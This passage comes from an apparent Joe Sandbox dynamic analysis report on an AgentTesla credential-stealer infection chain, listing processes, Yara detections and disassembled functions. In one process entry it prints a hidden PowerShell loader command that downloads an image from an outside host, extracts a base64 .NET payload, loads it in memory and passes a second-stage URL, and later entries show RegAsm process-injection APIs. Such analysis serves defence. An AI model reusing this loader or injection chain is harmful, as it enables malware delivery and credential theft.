Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:38:51
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	04:38:53
Start date:	30/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:38:56
Start date:	30/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\atrophiante.js"
Imagebase:	0x7ff6e5e00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:38:56
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:38:59
Start date:	30/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2699963900.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2699963900.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FFB4AD937B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1618941909.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4ad90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 4881678ac9f7ad6400bee31aa4e37cbded211de2e080650b6b543474345c1647
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 3301A77010CB0C8FD744EF0CE091AA6B3E0FB85320F10056DE58AC3661D632E882CB45

Analysis Process: powershell.exePID: 7728, Parent PID: 7564COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFB4AD97A01 Relevance: 1.8, APIs: 1, Instructions: 319
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FFB4AD97CAA

Memory Dump Source

Source File: 00000004.00000002.1572567696.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ad90000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b3728dd95ec41894f074b88da879eaea4e2e35da5a77e2f95959eb46a5794d62
Instruction ID: ea198ef996b8a03b4d3ab25670e1198322ba5b9ec251bfaf23776d6ca0fcb05b
Opcode Fuzzy Hash: b3728dd95ec41894f074b88da879eaea4e2e35da5a77e2f95959eb46a5794d62
Instruction Fuzzy Hash: 8BA10770908A5D8FDB99DF58C898BE9BBF1EB69301F1001AED44EE3291DB759984CF40

Function 00007FFB4AD9833D Relevance: 1.7, APIs: 1, Instructions: 212
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32 ref: 00007FFB4AD984AE

Memory Dump Source

Source File: 00000004.00000002.1572567696.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ad90000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e2711aee4ceac43848db6ed15c9648092da047bd515abb3b70926c5b98c38b63
Instruction ID: 3080f8053deb21bdf4824f926a441a03019e5860f962b8718af882cab80f86da
Opcode Fuzzy Hash: e2711aee4ceac43848db6ed15c9648092da047bd515abb3b70926c5b98c38b63
Instruction Fuzzy Hash: 19611370908A5C8FDB98DFA8C884BE9BBF1FB69310F1041AED44DE3251DB74A985CB44

Function 00007FFB4AD97E39 Relevance: 1.7, APIs: 1, Instructions: 187
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FFB4AD97F7E

Memory Dump Source

Source File: 00000004.00000002.1572567696.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ad90000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 708529bdf4bdbcc1867f2ddcc388e4fb9d9664c6eafe3ce52f1f8a27e91e879f
Instruction ID: 5e80aa59e7c1596bff17ec38ed7b625579370d899b3c7d22cc681afa58e41792
Opcode Fuzzy Hash: 708529bdf4bdbcc1867f2ddcc388e4fb9d9664c6eafe3ce52f1f8a27e91e879f
Instruction Fuzzy Hash: 85518E70D08A8D8FDB55DFA8C884BE9BBF1FB66310F1482AAD048D7256D7749885CF50

Function 00007FFB4AD98529 Relevance: 1.6, APIs: 1, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FFB4AD985F9

Memory Dump Source

Source File: 00000004.00000002.1572567696.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ad90000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cbfe753bd8f48929852bcc841349c1c77b857ef8fcf2cf3534613f526ffb7c24
Instruction ID: 9056576590f6d83893a09957349a59663e108a32b6d386a6cb98a1f5b44340aa
Opcode Fuzzy Hash: cbfe753bd8f48929852bcc841349c1c77b857ef8fcf2cf3534613f526ffb7c24
Instruction Fuzzy Hash: 5241497090C64C8FDB99DFA8D885BADBBF0EB5A310F1041AED049E7252DA70A845CF51

Function 00007FFB4AE629E9 Relevance: 1.1, Instructions: 1127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a8a77b1f3e1a8c11b33bef1a0da24f461a800234db82b2b4fc2a4909663fc0
Instruction ID: ca85a8317aa8bc42a63b5a00fceff5e90feb7784d02979c22c190a8e63a51efd
Opcode Fuzzy Hash: 41a8a77b1f3e1a8c11b33bef1a0da24f461a800234db82b2b4fc2a4909663fc0
Instruction Fuzzy Hash: B38135A2E4EBC50FE766BF3CC8191B47FD5FF52610B6805FED499CA093E90898068352

Function 00007FFB4AE6099E Relevance: .2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62fadceeec650addef51fe88d0a3b723072e99178cad6c34ada00fb4bd1be97
Instruction ID: 3d947035f90283c45365fe6e65cf7310ca788cbbfc0a55fcce2e55901a15fd4e
Opcode Fuzzy Hash: d62fadceeec650addef51fe88d0a3b723072e99178cad6c34ada00fb4bd1be97
Instruction Fuzzy Hash: 1D6128A2A4EA960FF7AABE7CC5612B5A6C5FF54A50BB844FAD05DC31C3DD08EC058341

Function 00007FFB4AE60CDE Relevance: .2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c044c9e77f37bec6e3ecd34f88828ab17eabdc8caec05e2d02812542bce895c
Instruction ID: f10708497f0cf52cd99707f0255864726fdb0477c957fb754db1fd6b9f47f746
Opcode Fuzzy Hash: 1c044c9e77f37bec6e3ecd34f88828ab17eabdc8caec05e2d02812542bce895c
Instruction Fuzzy Hash: 9A4147A2A5DA6A0FF7A5BE3CD5512B967C5FF84610BB446FAD41EC3186DD08EC018381

Function 00007FFB4AE609EA Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c14240855bccc60b6cb455dee6f8b45b2b2c4d4bbf47e0f740553b57eddc2b2
Instruction ID: d525d43979bca9b2cc3711e7f4f18f28f251b80299d7901c8cf0333b99e84fc0
Opcode Fuzzy Hash: 5c14240855bccc60b6cb455dee6f8b45b2b2c4d4bbf47e0f740553b57eddc2b2
Instruction Fuzzy Hash: F34123E3A4EA970FF3AABE7CC5612786AC5BF50A50BB884F9D46DC31C3DC08A8054241

Function 00007FFB4AE628FC Relevance: .1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 786b84a4618e8555f7c38a62e700428084fc7a837dbe70ed0d278420b0ca2372
Instruction ID: ee370aa9df48f2a1cb6669170229f2a334022277885d74755e87c0a124df14bb
Opcode Fuzzy Hash: 786b84a4618e8555f7c38a62e700428084fc7a837dbe70ed0d278420b0ca2372
Instruction Fuzzy Hash: DE31E972B0CA494FE768AE2CE8011F973D1FB99620B5406BFD54AC3597EE15E8078285

Function 00007FFB4AE61F9A Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1a130e30e6e80b3ec9028fbed01d92e47a752aba7b5afb9859b0d179c0a80f
Instruction ID: 5937b20c61fa2fc115ed45e2aa05ee951635f799d262fff4dea6c8a233230e1b
Opcode Fuzzy Hash: 8e1a130e30e6e80b3ec9028fbed01d92e47a752aba7b5afb9859b0d179c0a80f
Instruction Fuzzy Hash: 4331FB62F4DA190FEBE9BD6CD4116B8A3D2EF58610BA405FBD51DC7187EE09EC058380

Function 00007FFB4AE6225A Relevance: .1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6d2446226ea8f8a9fc26a86f938da114d233f8831f7f4928fdc305e9fe7ca4
Instruction ID: 14f98c036652903265d092bcdddba6a916864055ef4bd89e8904bec6f682ff27
Opcode Fuzzy Hash: 3e6d2446226ea8f8a9fc26a86f938da114d233f8831f7f4928fdc305e9fe7ca4
Instruction Fuzzy Hash: 9B210562F4CA194FE7A4BD6CE4462B8B3D5FF94610B6406F7D459C7186DE18E8054380

Function 00007FFB4AE60D2A Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e5296921816b5acb3d243f6509c4d2ef39375327d31ec65a978dd077cd24ef
Instruction ID: dd0718601c10e35d5917bbebe4b0764bdd5480abcfe23ac57f5fa4fd1d1d74f0
Opcode Fuzzy Hash: 85e5296921816b5acb3d243f6509c4d2ef39375327d31ec65a978dd077cd24ef
Instruction Fuzzy Hash: 131106A2E9DA3A0BF7A5BD3CD6961B852C9FF94610BB447F6D82DC3196DD08FC004280

Function 00007FFB4AE61FB8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15de74577c245e613615be8739babad11cc4d66e035bc55ad375d0aa20ffc328
Instruction ID: 4f67c8f8071533abc90aef4bf57c1d736a5852aafce9659c5abac050487fd433
Opcode Fuzzy Hash: 15de74577c245e613615be8739babad11cc4d66e035bc55ad375d0aa20ffc328
Instruction Fuzzy Hash: 7501F7A2F4EA1A0AF6EABD7C952527891C6EF88610BF409FAD41DC7587ED09EC005240

Function 00007FFB4AE62281 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d62cb6d307d64ee921505c5ee32b2ad19e6890d0bf662c7c9d3d0ac35017324
Instruction ID: 98f67d0cf6d0abf47864d1cfb93dcd33c40505d1be80ae04c97b2e0b446a1ebb
Opcode Fuzzy Hash: 1d62cb6d307d64ee921505c5ee32b2ad19e6890d0bf662c7c9d3d0ac35017324
Instruction Fuzzy Hash: 80F05293F4CA6A0AE3E5BE6CA40A1F462C4EF58A20BA406B2E45CC724BEC089C010380

Function 00007FFB4AE61E3E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1573087049.00007FFB4AE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ae60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b1f3692268fc4f5630b73705f3ab4f17cabc46c24625c8d8f3ef60d0c4a163
Instruction ID: d897a6ea41d35122b3ad6050a8365648b507273928ae877a3c0d2ea962a86333
Opcode Fuzzy Hash: e5b1f3692268fc4f5630b73705f3ab4f17cabc46c24625c8d8f3ef60d0c4a163
Instruction Fuzzy Hash: B6E06173E4D9290DF2E5BDBCD4091F45184FF146107B405F2D91CC7543EC049C1051C0

Non-executed Functions

Function 00007FFB4AD90E0B Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1572567696.00007FFB4AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4ad90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19db34da337dc2f07c0425bd0933e2accb0feb38f6b366e06d882f2f86d42ae3
Instruction ID: 30cb6e9888c5a7b29238fa4c95d1cbd40dd233236a8cf1b630c568c80c690dbb
Opcode Fuzzy Hash: 19db34da337dc2f07c0425bd0933e2accb0feb38f6b366e06d882f2f86d42ae3
Instruction Fuzzy Hash: F9A1A0D7A0EBD65EF7526E3CBCB60D42F68EF6366531902F7D0D44F0D3A805680A8262

Analysis Process: RegAsm.exePID: 7944, Parent PID: 7728COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.4%
Total number of Nodes:	126
Total number of Limit Nodes:	14

Executed Functions

Function 066CC250 Relevance: 1.9, Strings: 1, Instructions: 643
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 066CC89C

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: a0e372cc5733aea054cc23ec24ef6a0c8bfe2e9264f6850e563a53021b23e1c8
Instruction ID: d3813c0c4a9e21470748965af01db4f1ae35e3886d20dcd5d753dc7206e5b031
Opcode Fuzzy Hash: a0e372cc5733aea054cc23ec24ef6a0c8bfe2e9264f6850e563a53021b23e1c8
Instruction Fuzzy Hash: 3B328030B106199FDB54DB68D990BBEB7B6FB88324F109529D80AEB345DB35DC42CB90

Function 066C5258 Relevance: 1.8, Strings: 1, Instructions: 595
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 066C55A3

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: fdbe9cab23f24de7c9853ab83bf129fa60632730f232f09f96b44a91550ba1b7
Instruction ID: d6f00bb859b0735a2ab5dbbcd6d546ec3c983e3360911a81e9667bffe3614508
Opcode Fuzzy Hash: fdbe9cab23f24de7c9853ab83bf129fa60632730f232f09f96b44a91550ba1b7
Instruction Fuzzy Hash: 4D22B071E006159FDF64DBA4C8406AEBBB2FF89320F24856AD856EB344DB35EC51CB90

Function 011B6924 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 011B7127

Memory Dump Source

Source File: 00000007.00000002.2699635991.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11b0000_RegAsm.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 6e3a66f842d7fd569262472cb368ad73b79be77451bea4815c283829163b2f62
Instruction ID: 9fb9bdb4ad42ff1dcf17cf6db7c20167416de5902624a785b5528036a4f30aee
Opcode Fuzzy Hash: 6e3a66f842d7fd569262472cb368ad73b79be77451bea4815c283829163b2f62
Instruction Fuzzy Hash: 172139718002598FDB14DF9AD884BEEBBF4AF89210F14841AE455A3380D778A944CFA1

Function 066C66C0 Relevance: .8, Instructions: 818COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a12e332171c7525a70cf8057cf753473027a366c16e24705238ea7a770ef1a6
Instruction ID: 7121caa8166ed88cdd2850e66a372c5c6ad50befe66dd1b9195e3da1acdedfa3
Opcode Fuzzy Hash: 9a12e332171c7525a70cf8057cf753473027a366c16e24705238ea7a770ef1a6
Instruction Fuzzy Hash: B1629C30B006158FDB54DB68D954BADBBF2EF88324F248469D806EB351DB35EC82CB94

Function 066CB2F0 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6fd214352edc617a224f87a33fcfd2635789d4b1c84fdee13749c00ab0a5f84
Instruction ID: 6bccbb1c919249803adbc708ff54c0b37f78b45fe7fc55392f0bc79383808dd7
Opcode Fuzzy Hash: a6fd214352edc617a224f87a33fcfd2635789d4b1c84fdee13749c00ab0a5f84
Instruction Fuzzy Hash: DC227330E106098FEF64DBA9D4817BDB7B6EB89320F64852AE415EB355CB34DC81CB91

Function 066C3120 Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50676a84672e0a67ce1af1e23d04ddd42539be7eab46cc2b1534f8f8ba3d341b
Instruction ID: 6d67208f681d2e59ee2d05916eba0d852ad01c482e8db97700abbcb4a2f578d8
Opcode Fuzzy Hash: 50676a84672e0a67ce1af1e23d04ddd42539be7eab46cc2b1534f8f8ba3d341b
Instruction Fuzzy Hash: 6A321031E1071ACFDB14EB65C850AADB7B2FFC9310F50C6AAD449B7254EB31A985CB90

Function 066C7E50 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2714830973.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159aaf02de0aad0e6dd528395546aad7fa50fef7568d62e90d34d2e90e7100e5
Instruction ID: f226f0e24ed9cb52760aa22ec855425be874c9324283a4e95e8b2434540f0ec6
Opcode Fuzzy Hash: 159aaf02de0aad0e6dd528395546aad7fa50fef7568d62e90d34d2e90e7100e5
Instruction Fuzzy Hash: 7A027D30B006168FDB64EF68D9547AEBBA6FF84220F14856DD816DB344DB35ED82CB90

Function 066B6E08 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 066B6E96
GetCurrentThread.KERNEL32 ref: 066B6ED3
GetCurrentProcess.KERNEL32 ref: 066B6F10
GetCurrentThreadId.KERNEL32 ref: 066B6F69

Memory Dump Source

Source File: 00000007.00000002.2714700527.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66b0000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 225e34b491ac840dfa59204ed50a9edb07e030bc5adf49cb2aac9e64db0a96a8
Instruction ID: 6f53adf3789cbeefc26ad7770f2178fb22cd1b44874994c9756b016f32848b1d
Opcode Fuzzy Hash: 225e34b491ac840dfa59204ed50a9edb07e030bc5adf49cb2aac9e64db0a96a8
Instruction Fuzzy Hash: 315135B0900349CFDB94DFAAD948B9EBBF2BF88314F208419E409A7350DB756984CF65

Function 066B6E18 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 066B6E96
GetCurrentThread.KERNEL32 ref: 066B6ED3
GetCurrentProcess.KERNEL32 ref: 066B6F10
GetCurrentThreadId.KERNEL32 ref: 066B6F69

Memory Dump Source

Source File: 00000007.00000002.2714700527.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66b0000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e64e10f8472716ccd2dee0f0913a6ea93447a6ef4d3376d343778f01738a218e
Instruction ID: 42e358315e8ad7468a5a4eeb464196e75f3d31cc2b5550dba46c555496320760
Opcode Fuzzy Hash: e64e10f8472716ccd2dee0f0913a6ea93447a6ef4d3376d343778f01738a218e
Instruction Fuzzy Hash: 255134B0900349CFDB94DFAAD948B9EBBF2BF88314F208419E409A7350DB756984CF65

Function 066BF218 Relevance: 1.7, APIs: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 066BF47E

Memory Dump Source

Source File: 00000007.00000002.2714700527.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_66b0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ad3ffe1631f69cc1c49e99f18a1f68d89cfa3215c97d309c38c0ef344c20f400
Instruction ID: c9058111c12edac99b87348b6044b5d365aa39e6b1790744e01595633b7c4e87
Opcode Fuzzy Hash: ad3ffe1631f69cc1c49e99f18a1f68d89cfa3215c97d309c38c0ef344c20f400
